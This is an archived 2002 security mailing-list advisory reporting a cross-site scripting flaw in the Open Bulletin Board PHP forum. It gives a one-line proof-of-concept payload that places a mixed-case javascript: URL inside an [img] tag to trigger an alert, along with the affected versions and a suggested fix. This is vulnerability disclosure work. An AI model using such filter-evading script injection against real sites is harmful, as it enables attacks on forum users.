Open Bulletin Board javascript bug.

From: skizzikat_private
Date: Mon Feb 25 2002 - 09:13:18 PST

Next message: Chris Bisnett: "Re: Remote crashes in Yahoo messenger"

Previous message: Scott Walker Register: "Re: CheckPoint FW1 HTTP Security Hole"
In reply to: skizzikat_private: "XMB cross-scripting vulnerability"
Next in thread: Nate Pinchot: "RE: Open Bulletin Board javascript bug."
Reply: Nate Pinchot: "RE: Open Bulletin Board javascript bug."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

   OpenBB is free php-based forum.  

   Exploit:
   [img]javasCript:alert('Hello world.')[/img]

   Vulnerable systems:
   All versions of Open Bulletin Board including 
v.1.0.0 

   Immune systems:
   None

   Solution:
   All url's in [img] tags should start  
with "http://" 

                                     Yurij Rumiantsev

Next message: Chris Bisnett: "Re: Remote crashes in Yahoo messenger"
Previous message: Scott Walker Register: "Re: CheckPoint FW1 HTTP Security Hole"
In reply to: skizzikat_private: "XMB cross-scripting vulnerability"
Next in thread: Nate Pinchot: "RE: Open Bulletin Board javascript bug."
Reply: Nate Pinchot: "RE: Open Bulletin Board javascript bug."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Feb 25 2002 - 13:06:42 PST